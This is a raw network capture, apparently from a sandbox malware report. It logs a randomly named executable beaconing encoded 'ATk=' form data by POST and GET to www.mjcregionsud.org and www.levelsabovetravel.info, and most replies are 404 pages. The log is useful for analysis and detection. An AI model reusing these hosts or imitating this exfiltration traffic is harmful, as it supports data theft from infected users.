Oct 11, 2024 10:01:52.552850008 CEST	807	OUT	POST /r61b/ HTTP/1.1 Host: www.mjcregionsud.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.mjcregionsud.org Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.mjcregionsud.org/r61b/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 2b 41 67 62 64 6a 78 4c 64 61 71 53 34 63 52 6e 6a 42 74 54 4d 45 49 56 64 5a 65 55 6f 71 56 74 59 42 67 37 6f 45 58 4d 4f 6f 59 35 75 65 32 45 52 68 6f 47 30 7a 75 6c 55 41 65 35 78 4c 4e 79 31 7a 6b 33 51 75 57 56 57 6f 52 4e 4c 72 38 57 76 77 63 76 65 33 4f 4b 41 76 70 39 34 4e 59 66 56 6f 75 70 45 39 33 6a 35 30 71 5a 4d 61 4f 45 4f 6f 39 58 6f 36 6a 33 64 4f 54 70 6e 6c 67 74 73 53 35 4f 31 5a 67 5a 6a 73 4c 7a 55 65 77 42 75 34 74 2f 79 66 70 69 50 42 70 47 57 66 6a 4f 44 51 30 4f 59 4a 45 5a 62 35 44 51 58 34 65 54 33 2b 41 68 4b 77 3d 3d Data Ascii: ATk=6oGhiNTWWXcP+AgbdjxLdaqS4cRnjBtTMEIVdZeUoqVtYBg7oEXMOoY5ue2ERhoG0zulUAe5xLNy1zk3QuWVWoRNLr8Wvwcve3OKAvp94NYfVoupE93j50qZMaOEOo9Xo6j3dOTpnlgtsS5O1ZgZjsLzUewBu4t/yfpiPBpGWfjODQ0OYJEZb5DQX4eT3+AhKw==
Oct 11, 2024 10:01:52.727741957 CEST	359	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:01:52 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.11.20	49836	91.212.26.5	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:55.259905100 CEST	827	OUT	POST /r61b/ HTTP/1.1 Host: www.mjcregionsud.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.mjcregionsud.org Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.mjcregionsud.org/r61b/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 78 42 77 62 53 67 5a 4c 61 36 71 52 6d 4d 52 6e 36 52 74 58 4d 45 4d 56 64 59 71 36 70 59 78 74 59 68 77 37 70 46 58 4d 62 6f 59 35 38 2b 32 42 4d 78 6f 59 30 7a 54 59 55 46 32 35 78 4c 4a 79 31 33 67 33 51 5a 4c 44 56 59 52 4c 41 4c 38 48 79 41 63 76 65 33 4f 4b 41 76 38 31 34 4e 41 66 56 59 2b 70 46 66 66 67 36 30 71 65 45 36 4f 45 46 49 39 70 6f 36 6a 56 64 50 2f 50 6e 6a 38 74 73 54 4a 4f 32 4e 30 61 71 73 4c 78 62 2b 78 73 2b 5a 39 30 2b 4c 42 7a 48 54 4a 50 58 39 33 6e 50 6d 6c 55 46 37 77 39 59 71 66 69 54 49 6e 37 31 38 42 36 58 33 51 34 4e 36 4f 54 46 33 4f 33 4c 4c 6c 34 72 69 34 4a 73 66 51 3d Data Ascii: ATk=6oGhiNTWWXcPxBwbSgZLa6qRmMRn6RtXMEMVdYq6pYxtYhw7pFXMboY58+2BMxoY0zTYUF25xLJy13g3QZLDVYRLAL8HyAcve3OKAv814NAfVY+pFffg60qeE6OEFI9po6jVdP/Pnj8tsTJO2N0aqsLxb+xs+Z90+LBzHTJPX93nPmlUF7w9YqfiTIn718B6X3Q4N6OTF3O3LLl4ri4JsfQ=
Oct 11, 2024 10:01:55.435024977 CEST	359	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:01:55 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.11.20	49837	91.212.26.5	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:01:57.960618973 CEST	2578	OUT	POST /r61b/ HTTP/1.1 Host: www.mjcregionsud.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.mjcregionsud.org Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.mjcregionsud.org/r61b/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 36 6f 47 68 69 4e 54 57 57 58 63 50 78 42 77 62 53 67 5a 4c 61 36 71 52 6d 4d 52 6e 36 52 74 58 4d 45 4d 56 64 59 71 36 70 59 35 74 5a 53 6f 37 70 69 37 4d 4a 59 59 35 2f 2b 32 41 4d 78 70 45 30 7a 37 63 55 46 79 44 78 4e 56 79 32 55 6f 33 42 4e 2f 44 43 6f 52 4c 50 72 39 41 76 77 63 32 65 7a 53 47 41 76 73 31 34 4e 41 66 56 65 79 70 43 4e 33 67 38 30 71 5a 4d 61 4f 41 4f 6f 38 45 6f 36 36 71 64 50 4c 35 6d 51 6b 74 73 7a 5a 4f 6c 4f 4d 61 32 38 4c 76 50 65 78 30 2b 5a 77 73 2b 50 68 52 48 51 55 55 58 2b 6e 6e 66 54 4d 41 47 59 51 59 4c 37 2f 33 61 4a 47 4d 2b 75 5a 61 4f 6c 73 53 4a 5a 37 39 5a 43 7a 69 46 6f 5a 65 77 51 63 32 32 37 64 6b 65 33 2b 42 71 2f 54 2f 58 59 62 56 4f 62 56 59 52 70 34 42 4c 51 4c 49 4f 31 36 43 54 2b 79 65 57 76 4f 58 6b 2b 73 5a 62 31 77 33 77 48 53 77 6d 32 66 79 49 6f 73 6c 66 32 47 64 43 4d 39 75 45 6a 73 36 75 69 4e 74 62 57 76 79 4b 59 2b 5a 51 56 7a 76 65 58 45 50 42 32 31 63 50 68 67 30 39 59 7a 66 4f 2b 52 2b 70 5a 54 67 31 6f 4c 38 46 44 54 68 67 6a [TRUNCATED] Data Ascii: ATk=6oGhiNTWWXcPxBwbSgZLa6qRmMRn6RtXMEMVdYq6pY5tZSo7pi7MJYY5/+2AMxpE0z7cUFyDxNVy2Uo3BN/DCoRLPr9Avwc2ezSGAvs14NAfVeypCN3g80qZMaOAOo8Eo66qdPL5mQktszZOlOMa28LvPex0+Zws+PhRHQUUX+nnfTMAGYQYL7/3aJGM+uZaOlsSJZ79ZCziFoZewQc227dke3+Bq/T/XYbVObVYRp4BLQLIO16CT+yeWvOXk+sZb1w3wHSwm2fyIoslf2GdCM9uEjs6uiNtbWvyKY+ZQVzveXEPB21cPhg09YzfO+R+pZTg1oL8FDThgjYpbqT34Cg837i7gE1ZUPzqGceTN2VBQ1SxifH7Ao47T/EGOs+/i4vdF2GWUC1WPbOER2g44Mo9jUlwHD21HrHKTe3n8fBgeAn/bFr+glqvxjY9AhP7m8wkH4y9SAhdTDAzFOW7MoUOispvjKC/Vo92xWO4giba+lxOGQdUbyUNR6tgFKxzQP8TglGHNX3aCIdjYj2OQlBH9PhYsVQOb8wYmjCj+N6nKxv1lyqbH6BjFviGNOZtsOcHDl6PCIR2Hewxo6nf/XOsr4tt2soAW5wwiQTw428pC+cGPCwN2ikCJK8wPRGJLxQNWjjDCnKTBT2eZe4M/mO1oJRFSXvIZ0+kkrnx7xmB9oQa7f7TXNwMVszG6aPlij/DVlCHt6tHWmlHcPiRHhVR7wxYxeI6GnbUJzZTR/e3oRSJnvLyT4fGrCfsvCNoa9UrvKdfkkEA1wJarEb06Vp71mxB2yQDfpyPMW2qEhftkse+93Ml5Dhukmcs1dH1tyebap7TsYI2vpzzs49JNDeJNEkECR9yxjuV9rLocOg+blN3WuSG1r4t/MwyzHfW8HgYyfUh8frCJsbZxFVUXrEnOX6UbLh0tTaMh1ElROFzWfuCC9PxBSXWjiN7EQnwYll/LoEx+ixNd6oCdrq6BOph78j0Qsk+y++P508wak1H4IQd [TRUNCATED]
Oct 11, 2024 10:01:57.960640907 CEST	5156	OUT	Data Raw: 35 31 4d 4d 6c 6d 64 78 44 67 6a 4e 43 55 48 62 33 41 6b 4d 6e 70 69 56 63 67 4a 45 32 34 69 4a 51 39 48 41 2f 5a 54 68 66 30 2f 4c 56 43 71 32 39 79 42 5a 57 68 77 4c 79 56 57 79 41 57 66 53 41 4f 48 78 44 4b 6f 32 4d 39 67 46 44 46 33 6b 31 68 Data Ascii: 51MMlmdxDgjNCUHb3AkMnpiVcgJE24iJQ9HA/ZThf0/LVCq29yBZWhwLyVWyAWfSAOHxDKo2M9gFDF3k1hQntQtHGYZYrmrzAQR709dFlTbhljiYJbLd+WE19EXlyasdhB39/zwJItvIdpCcO8O5Upg6OKlKRd9xUH8eIOd447ieiQ2btya1GqTujvI+jGi9ilKjwCEcuXoaBzNcMOQtm914ewrlaUNKalpScwn+bOawxJFbu4A
Oct 11, 2024 10:01:57.960705042 CEST	242	OUT	Data Raw: 73 54 4e 2f 39 70 75 48 47 37 6a 4b 74 6e 63 49 77 30 6d 6b 4e 43 43 45 78 59 5a 6c 65 48 65 71 67 69 75 45 5a 39 73 41 38 50 48 46 54 6a 57 4d 47 6b 61 69 6f 42 62 47 36 6b 5a 4f 6b 69 62 6f 4a 4c 6a 4c 6d 72 70 41 47 44 6a 79 4f 42 57 7a 6d 39 Data Ascii: sTN/9puHG7jKtncIw0mkNCCExYZleHeqgiuEZ9sA8PHFTjWMGkaioBbG6kZOkiboJLjLmrpAGDjyOBWzm9BR2yvJctkR8F2GMAg6Gn/ys2nimfS2xqxfje9sipRhB/3XEu0dYlLE3xg6uB10/8GAds+UeaWQZYSTvlgee/11qwTeeJkG5dzR0ULZYTH8y+3LKB98ylHZz9hrUDHj14oN+y3IVkgTsUogJ+mQigFtKrR3Y5pA==
Oct 11, 2024 10:01:58.135976076 CEST	359	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:01:58 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.11.20	49838	91.212.26.5	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:00.660604954 CEST	544	OUT	GET /r61b/?ATk=3quBh4mzL0lL+B9uaB4+B/ehh8Vuymt6GENoLoKygJVSWFdT0X7NdoMT/6uiE3Ni1BD7Zx2rh99upTwYdPvuPJZKDP4PvDgre2/rGfgIw+gfAM2DFPuj10Q=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.mjcregionsud.org Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:02:00.835939884 CEST	359	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 11 Oct 2024 08:02:00 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.11.20	49839	3.33.130.190	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:06.053538084 CEST	825	OUT	POST /kbee/ HTTP/1.1 Host: www.levelsabovetravel.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.levelsabovetravel.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.levelsabovetravel.info/kbee/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4f 41 49 7a 4c 73 6b 44 2f 39 79 2b 7a 5a 32 6b 6f 5a 41 78 52 6a 31 45 4d 4d 7a 35 6c 52 71 30 72 63 78 31 38 37 4e 59 79 33 78 54 72 65 64 34 66 74 44 33 4a 69 35 6e 68 4f 4c 2f 5a 62 6b 34 68 47 76 4c 79 6a 33 69 6a 46 45 44 33 4b 52 30 68 2b 7a 31 42 75 64 6d 55 32 47 52 4b 68 59 50 78 77 78 41 49 49 34 4a 56 4b 44 2b 6b 38 54 6d 2f 69 6f 64 75 56 48 33 74 32 33 42 4f 6a 6b 63 63 31 71 4e 71 78 39 31 7a 71 73 6c 31 4e 76 68 7a 7a 42 50 46 76 67 44 36 39 56 59 30 39 61 78 69 4f 76 31 32 33 71 45 4a 65 63 2f 48 69 73 68 48 2b 44 4e 4d 73 48 39 6e 59 52 74 55 34 62 6c 43 51 3d 3d Data Ascii: ATk=OAIzLskD/9y+zZ2koZAxRj1EMMz5lRq0rcx187NYy3xTred4ftD3Ji5nhOL/Zbk4hGvLyj3ijFED3KR0h+z1BudmU2GRKhYPxwxAII4JVKD+k8Tm/ioduVH3t23BOjkcc1qNqx91zqsl1NvhzzBPFvgD69VY09axiOv123qEJec/HishH+DNMsH9nYRtU4blCQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.11.20	49840	3.33.130.190	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:08.683124065 CEST	845	OUT	POST /kbee/ HTTP/1.1 Host: www.levelsabovetravel.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.levelsabovetravel.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.levelsabovetravel.info/kbee/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4f 41 49 7a 4c 73 6b 44 2f 39 79 2b 77 39 79 6b 71 37 6f 78 57 44 31 48 4a 4d 7a 35 71 78 71 34 72 63 4e 31 38 36 49 64 7a 46 56 54 6f 38 56 34 65 73 44 33 46 43 35 6e 31 65 4c 77 55 37 6b 33 68 48 53 32 79 68 6a 69 6a 45 67 44 33 4c 68 30 68 73 62 79 42 2b 64 6b 59 57 47 54 46 42 59 50 78 77 78 41 49 49 38 6e 56 4c 72 2b 6b 50 4c 6d 74 51 51 65 77 6c 48 30 73 32 33 42 5a 7a 6b 59 63 31 72 67 71 77 51 51 7a 6f 55 6c 31 4d 66 68 7a 68 70 4d 50 76 67 2f 30 64 55 4f 34 39 2f 64 6f 4b 50 4a 37 6b 32 38 47 75 41 6b 50 55 39 37 61 4d 33 70 50 2f 62 50 6a 6f 6f 46 57 36 61 2b 66 65 6c 6f 72 4c 56 34 41 70 68 36 38 42 49 55 55 74 2b 6c 64 73 30 3d Data Ascii: ATk=OAIzLskD/9y+w9ykq7oxWD1HJMz5qxq4rcN186IdzFVTo8V4esD3FC5n1eLwU7k3hHS2yhjijEgD3Lh0hsbyB+dkYWGTFBYPxwxAII8nVLr+kPLmtQQewlH0s23BZzkYc1rgqwQQzoUl1MfhzhpMPvg/0dUO49/doKPJ7k28GuAkPU97aM3pP/bPjooFW6a+felorLV4Aph68BIUUt+lds0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.11.20	49841	3.33.130.190	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:11.323476076 CEST	1289	OUT	POST /kbee/ HTTP/1.1 Host: www.levelsabovetravel.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Origin: http://www.levelsabovetravel.info Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Referer: http://www.levelsabovetravel.info/kbee/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4 Data Raw: 41 54 6b 3d 4f 41 49 7a 4c 73 6b 44 2f 39 79 2b 77 39 79 6b 71 37 6f 78 57 44 31 48 4a 4d 7a 35 71 78 71 34 72 63 4e 31 38 36 49 64 7a 46 64 54 72 50 4e 34 66 50 62 33 45 43 35 6e 70 75 4b 33 55 37 6b 71 68 48 4c 78 79 68 66 49 6a 48 49 44 32 70 5a 30 32 6f 50 79 4c 2b 64 6b 48 6d 47 57 4b 68 5a 56 78 77 42 45 49 49 4d 6e 56 4c 72 2b 6b 4f 37 6d 75 43 6f 65 79 6c 48 33 74 32 33 7a 4f 6a 6c 4e 63 31 44 65 71 77 55 75 77 59 30 6c 30 73 50 68 78 53 42 4d 44 76 67 39 33 64 55 47 34 39 44 43 6f 4f 76 2f 37 67 32 57 47 75 34 6b 4e 79 42 67 42 50 79 31 52 70 6e 7a 70 37 73 6c 43 61 36 35 58 74 39 69 72 70 4a 32 48 65 39 4e 35 33 30 33 42 49 71 6e 47 34 53 59 77 30 74 6c 42 71 61 31 43 50 32 66 50 79 6f 32 42 52 2f 7a 67 41 47 79 6a 44 36 52 6b 52 66 56 42 4b 7a 62 6e 45 78 4f 32 72 51 7a 4e 5a 41 48 37 4c 6b 30 51 59 61 30 44 71 62 47 6c 52 66 44 6b 32 49 37 41 52 75 35 78 2f 6c 4c 54 70 73 59 35 72 38 52 74 49 39 4e 65 38 68 6c 43 37 79 39 64 2b 32 70 42 32 38 32 79 64 57 49 32 73 6b 58 6e 73 37 54 69 42 [TRUNCATED] Data Ascii: ATk=OAIzLskD/9y+w9ykq7oxWD1HJMz5qxq4rcN186IdzFdTrPN4fPb3EC5npuK3U7kqhHLxyhfIjHID2pZ02oPyL+dkHmGWKhZVxwBEIIMnVLr+kO7muCoeylH3t23zOjlNc1DeqwUuwY0l0sPhxSBMDvg93dUG49DCoOv/7g2WGu4kNyBgBPy1Rpnzp7slCa65Xt9irpJ2He9N5303BIqnG4SYw0tlBqa1CP2fPyo2BR/zgAGyjD6RkRfVBKzbnExO2rQzNZAH7Lk0QYa0DqbGlRfDk2I7ARu5x/lLTpsY5r8RtI9Ne8hlC7y9d+2pB282ydWI2skXns7TiBt2V1y7nYp0bfs3iOUYzxFJP04EeYJt2R4vW2ufWKY5FkMYxyXWQo+z6GOrNQWDtYM3Ql8nfdhgNSKjPyEp/u0PHDsgLHc8iKUmRIDPxu2O99BpVY/aFgXN0Wp9fQJKkkEFuHmUg/hUAceuqyspwv6xElZ3v0KsKBLLbcqckgw3sp+G4rw1Pj+WcixU2ef2lSby8ruFm3Q76HicgTpoJIo6LB+Q/scDhT/lgq6rm5zK/tUOMXyFaV4hfhrAiFUNyatLNDjuYHfZarMG4oy25qKS5HDN7z9zAbJ+38wBopT9B/nlA71ENmqvcSH9YA29KjyOjBF
Oct 11, 2024 10:02:11.323527098 CEST	6705	OUT	Data Raw: 63 63 62 49 33 77 6d 79 77 52 34 76 45 7a 39 41 54 55 79 32 6b 79 71 4a 4b 72 48 42 6d 45 41 2f 64 6f 35 35 4d 56 32 30 5a 53 70 45 76 68 50 4b 42 6e 6d 78 4c 6a 68 4c 52 52 57 35 48 6f 66 55 6e 50 77 6d 74 59 41 4a 49 30 7a 38 53 36 46 62 6b 2b Data Ascii: ccbI3wmywR4vEz9ATUy2kyqJKrHBmEA/do55MV20ZSpEvhPKBnmxLjhLRRW5HofUnPwmtYAJI0z8S6Fbk+HjsirYThNDAH9h+pFpR/yEcjndc+u9im3Jg3DyCgGX+EfuDJ3rtD9B3fyjzOcwDnixPEdXlsbEI9xQc0VbJAvrcxgFHYL0jg4c9oNyoU9nG33a0TtKQ5bq3FU2oJd4uzSRoQkTa8aQt1ki0fAQKpM+IhXxqip5/09

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.11.20	49842	3.33.130.190	80	7868	C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:02:13.961623907 CEST	550	OUT	GET /kbee/?ATk=DCgTIaYcg8rLkvez6bpKNDdTbca+kjCnkbIF1Zor3lwvkrlOJ/rxEw94juCbWbA1v3jo2CjSkAc6+9U16ObyEt1HYmrMXA9V8CM6TYsVGbC64eHlmw9Jr2w=&VDohI=5PBL_pQpTf5haV HTTP/1.1 Host: www.levelsabovetravel.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
Oct 11, 2024 10:02:14.990228891 CEST	400	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 11 Oct 2024 08:02:14 GMT Content-Type: text/html Content-Length: 260 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 54 6b 3d 44 43 67 54 49 61 59 63 67 38 72 4c 6b 76 65 7a 36 62 70 4b 4e 44 64 54 62 63 61 2b 6b 6a 43 6e 6b 62 49 46 31 5a 6f 72 33 6c 77 76 6b 72 6c 4f 4a 2f 72 78 45 77 39 34 6a 75 43 62 57 62 41 31 76 33 6a 6f 32 43 6a 53 6b 41 63 36 2b 39 55 31 36 4f 62 79 45 74 31 48 59 6d 72 4d 58 41 39 56 38 43 4d 36 54 59 73 56 47 62 43 36 34 65 48 6c 6d 77 39 4a 72 32 77 3d 26 56 44 6f 68 49 3d 35 50 42 4c 5f 70 51 70 54 66 35 68 61 56 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ATk=DCgTIaYcg8rLkvez6bpKNDdTbca+kjCnkbIF1Zor3lwvkrlOJ/rxEw94juCbWbA1v3jo2CjSkAc6+9U16ObyEt1HYmrMXA9V8CM6TYsVGbC64eHlmw9Jr2w=&VDohI=5PBL_pQpTf5haV"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
